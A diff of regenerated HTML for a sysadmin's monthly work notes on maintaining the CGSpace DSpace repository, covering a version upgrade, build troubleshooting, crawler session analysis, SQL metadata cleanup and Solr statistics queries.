<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 79m44.392s
@ -292,15 +292,15 @@ sys 2m20.248s
<li>Run system updates on DSpace Test and reboot the server</li>
<li>In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;19/Aug/2018&#39; | grep -c 5.9.6.51
1553
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-08-19
1724
</code></pre><ul>
<li>I don&rsquo;t even know how its possible for the bot to use MORE sessions than total requests&hellip;</li>
<li>The user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
</code></pre><ul>
<li>So I&rsquo;m thinking we should add &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager valve, as we already have &ldquo;bot&rdquo; that catches Googlebot, Bingbot, etc.</li>
</ul>
@ -325,7 +325,7 @@ sys 2m20.248s
<ul>
<li>Something must have happened, as the <code>mvn package</code> <em>always</em> takes about two hours now, stopping for a very long time near the end at this step:</li>
</ul>
<pre><code>[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
<pre tabindex="0"><code>[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
</code></pre><ul>
<li>It&rsquo;s the same on DSpace Test, my local laptop, and CGSpace&hellip;</li>
<li>It wasn&rsquo;t this way before when I was constantly building the previous 5.8 branch with Atmire patches&hellip;</li>
@ -335,7 +335,7 @@ sys 2m20.248s
<li>That one only took 13 minutes! So there is definitely something wrong with our 5.8 branch, now I should try vanilla DSpace 5.8</li>
<li>I notice that the step this pauses at is:</li>
</ul>
<pre><code>[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
<pre tabindex="0"><code>[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
</code></pre><ul>
<li>And I notice that Atmire changed something in the XMLUI module&rsquo;s <code>pom.xml</code> as part of the DSpace 5.8 changes, specifically to remove the exclude for <code>node_modules</code> in the <code>maven-war-plugin</code> step</li>
<li>This exclude is <em>present</em> in vanilla DSpace, and if I add it back the build time goes from 1 hour 23 minutes to 12 minutes!</li>
@ -352,23 +352,23 @@ sys 2m20.248s
<li>It appears that the web UI&rsquo;s upload interface <em>requires</em> you to specify the collection, whereas the CLI interface allows you to omit the collection command line flag and defer to the <code>collections</code> file inside each item in the bundle</li>
<li>I imported the CTA items on CGSpace for Sisay:</li>
</ul>
<pre><code>$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
<pre tabindex="0"><code>$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
</code></pre><h2 id="2018-08-26">2018-08-26</h2>
<ul>
<li>Doing the DSpace 5.8 upgrade on CGSpace (linode18)</li>
<li>I already finished the Maven build, now I&rsquo;ll take a backup of the PostgreSQL database and do a database cleanup just in case:</li>
</ul>
<pre><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
$ dspace cleanup -v
</code></pre><ul>
<li>Now I can stop Tomcat and do the install:</li>
</ul>
<pre><code>$ cd dspace/target/dspace-installer
<pre tabindex="0"><code>$ cd dspace/target/dspace-installer
$ ant update clean_backups update_geolite
</code></pre><ul>
<li>After the successful Ant update I can run the database migrations:</li>
</ul>
<pre><code>$ psql dspace dspace
<pre tabindex="0"><code>$ psql dspace dspace
dspace=&gt; \i /tmp/Atmire-DSpace-5.8-Schema-Migration.sql
DELETE 0
@ -380,7 +380,7 @@ $ dspace database migrate ignored
</code></pre><ul>
<li>Then I&rsquo;ll run all system updates and reboot the server:</li>
</ul>
<pre><code>$ sudo su -
<pre tabindex="0"><code>$ sudo su -
# apt update &amp;&amp; apt full-upgrade
# apt clean &amp;&amp; apt autoclean &amp;&amp; apt autoremove
# reboot
@ -391,11 +391,11 @@ $ dspace database migrate ignored
<li>I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject <code>GENDER</code> or <code>GENDER POVERTY AND INSTITUTIONS</code>, and CRP <code>Water, Land and Ecosystems</code></li>
<li>Then I extracted the Handle links from the report so I could export each item&rsquo;s metadata as CSV</li>
</ul>
<pre><code>$ grep -o -E &quot;[0-9]{5}/[0-9]{0,5}&quot; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ grep -o -E &#34;[0-9]{5}/[0-9]{0,5}&#34; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>Then on the DSpace server I exported the metadata for each item one by one:</li>
</ul>
<pre><code>$ while read -r line; do dspace metadata-export -f &quot;/tmp/${line/\//-}.csv&quot; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &#34;/tmp/${line/\//-}.csv&#34; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them</li>
<li>I&rsquo;m not sure how to proceed without writing some script to parse and join the CSVs, and I don&rsquo;t think it&rsquo;s worth my time</li>
@ -442,15 +442,15 @@ $ dspace database migrate ignored
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and ru
Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -60,12 +60,12 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -111,7 +111,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<p class="blog-post-meta">
<time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -123,8 +123,8 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
</ul>
<pre><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
<pre tabindex="0"><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
@ -139,7 +139,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
</code></pre><ul>
<li>Full log here: <a href="https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2">https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2</a></li>
<li>XMLUI fails to load, but the REST, SOLR, JSPUI, etc work</li>
@ -184,20 +184,20 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>Playing with <a href="https://github.com/eykhagen/strest">strest</a> to test the DSpace REST API programatically</li>
<li>For example, given this <code>test.yaml</code>:</li>
</ul>
<pre><code>version: 1
<pre tabindex="0"><code>version: 1
requests:
test:
method: GET
url: https://dspacetest.cgiar.org/rest/test
validate:
raw: &quot;REST api is running.&quot;
raw: &#34;REST api is running.&#34;
login:
url: https://dspacetest.cgiar.org/rest/login
method: POST
data:
json: {&quot;email&quot;:&quot;test@dspace&quot;,&quot;password&quot;:&quot;thepass&quot;}
json: {&#34;email&#34;:&#34;test@dspace&#34;,&#34;password&#34;:&#34;thepass&#34;}
status:
url: https://dspacetest.cgiar.org/rest/status
@ -217,27 +217,27 @@ requests:
<li>We could eventually use this to test sanity of the API for creating collections etc</li>
<li>A user is getting an error in her workflow:</li>
</ul>
<pre><code>2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step:
<pre tabindex="0"><code>2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step:
org.dspace.authorize.AuthorizeException: Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:2 by user 3819
</code></pre><ul>
<li>Seems to be during submit step, because it&rsquo;s workflow step 1&hellip;?</li>
<li>Move some top-level CRP communities to be below the new <a href="https://cgspace.cgiar.org/handle/10568/97114">CGIAR Research Programs and Platforms</a> community:</li>
</ul>
<pre><code>$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
<pre tabindex="0"><code>$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
$ dspace community-filiator --set -p 10568/97114 -c 10568/35409
$ dspace community-filiator --set -p 10568/97114 -c 10568/3112
</code></pre><ul>
<li>Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:</li>
</ul>
<pre><code>update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI Juornal&#39;;
UPDATE 1
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI journal&#39;;
UPDATE 23
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;YES&#39;;
UPDATE 1
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;NO&#39;;
DELETE 17
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI&#39;;
UPDATE 15
</code></pre><ul>
<li>Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)</li>
@ -246,7 +246,7 @@ UPDATE 15
<li>Linode said that CGSpace (linode18) had a high CPU load earlier today</li>
<li>When I looked, I see it&rsquo;s the same Russian IP that I noticed last month:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1459 157.55.39.202
1579 95.108.181.88
1615 157.55.39.147
@ -260,17 +260,17 @@ UPDATE 15
</code></pre><ul>
<li>And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):</li>
</ul>
<pre><code># grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10
<pre tabindex="0"><code># grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-09-10
14133
</code></pre><ul>
<li>The user agent is still the same:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
</code></pre><ul>
<li>I added <code>.*crawl.*</code> to the Tomcat Session Crawler Manager Valve, so I&rsquo;m not sure why the bot is creating so many sessions&hellip;</li>
<li>I just tested that user agent on CGSpace and it <em>does not</em> create a new session:</li>
</ul>
<pre><code>$ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#39;
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -300,7 +300,7 @@ X-XSS-Protection: 1; mode=block
<li>Merge AReS explorer changes to nginx config and deploy on CGSpace so CodeObia can start testing more</li>
<li>Re-create my local Docker container for PostgreSQL data, but using a volume for the database data:</li>
</ul>
<pre><code>$ sudo docker volume create --name dspacetest_data
<pre tabindex="0"><code>$ sudo docker volume create --name dspacetest_data
$ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
<li>Sisay is still having problems with the controlled vocabulary for top authors</li>
@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
<li>Linode says that CGSpace (linode18) has had high CPU for the past two hours</li>
<li>The top IP addresses today are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;13/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;13/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
32 46.229.161.131
38 104.198.9.108
39 66.249.64.91
@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
</code></pre><ul>
<li>And the top two addresses seem to be re-using their Tomcat sessions properly:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92&#39; dspace.log.2018-09-13 | sort | uniq
7
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77&#39; dspace.log.2018-09-13 | sort | uniq
2
</code></pre><ul>
<li>So I&rsquo;m not sure what&rsquo;s going on</li>
@ -343,7 +343,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>I said no, but that we might be able to piggyback on the Atmire statlet REST API</li>
<li>For example, when you expand the &ldquo;statlet&rdquo; at the bottom of an item like <a href="https://cgspace.cgiar.org/handle/10568/97103">10568/97103</a> you can see the following request in the browser console:</li>
</ul>
<pre><code>https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
</code></pre><ul>
<li>That JSON file has the total page views and item downloads for the item&hellip;</li>
<li>Abenet forwarded a request by CIP that item thumbnails be included in RSS feeds</li>
@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>There are some example queries on the <a href="https://wiki.lyrasis.org/display/DSPACE/Solr">DSpace Solr wiki</a></li>
<li>For example, this query returns 1655 rows for item <a href="https://cgspace.cgiar.org/handle/10568/10630">10568/10630</a>:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&#39;
</code></pre><ul>
<li>The id in the Solr query is the item&rsquo;s database id (get it from the REST API or something)</li>
<li>Next, I adopted a query to get the downloads and it shows 889, which is similar to the number Atmire&rsquo;s statlet shows, though the query logic here is confusing:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>According to the <a href="https://wiki.apache.org/solr/SolrQuerySyntax">SolrQuerySyntax</a> page on the Apache wiki, the <code>[* TO *]</code> syntax just selects a range (in this case all values for a field)</li>
<li>So it seems to be:
@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
</li>
<li>What the shit, I think I&rsquo;m right: the simplified logic in <em>this</em> query returns the same 889:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>And if I simplify the <code>statistics_type</code> logic the same way, it still returns the same 889!</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>As for item views, I suppose that&rsquo;s just the same query, minus the <code>bundleName:ORIGINAL</code>:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>That one returns 766, which is exactly 1655 minus 889&hellip;</li>
<li>Also, Solr&rsquo;s <code>fq</code> is similar to the regular <code>q</code> query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries</li>
@ -432,18 +432,18 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>It uses the Python-based <a href="https://falcon.readthedocs.io">Falcon</a> web framework and talks to Solr directly using the <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> library (which seems to have issues in Python 3.7 currently)</li>
<li>After deploying on DSpace Test I can then get the stats for an item using its ID:</li>
</ul>
<pre><code>$ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
<pre tabindex="0"><code>$ http -b &#39;https://dspacetest.cgiar.org/rest/statistics/item?id=110988&#39;
{
&quot;downloads&quot;: 2,
&quot;id&quot;: 110988,
&quot;views&quot;: 15
&#34;downloads&#34;: 2,
&#34;id&#34;: 110988,
&#34;views&#34;: 15
}
</code></pre><ul>
<li>The numbers are different than those that come from Atmire&rsquo;s statlets for some reason, but as I&rsquo;m querying Solr directly, I have no idea where their numbers come from!</li>
<li>Moayad from CodeObia asked if I could make the API be able to paginate over all items, for example: /statistics?limit=100&amp;page=1</li>
<li>Getting all the item IDs from PostgreSQL is certainly easy:</li>
</ul>
<pre><code>dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
<pre tabindex="0"><code>dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
</code></pre><ul>
<li>The rest of the Falcon tooling will be more difficult&hellip;</li>
</ul>
@ -457,11 +457,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>Contact Atmire to ask how we can buy more credits for future development (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=644">#644</a>)</li>
<li>I researched the Solr <code>filterCache</code> size and I found out that the formula for calculating the potential memory use of <strong>each entry</strong> in the cache is:</li>
</ul>
<pre><code>((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
<pre tabindex="0"><code>((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
</code></pre><ul>
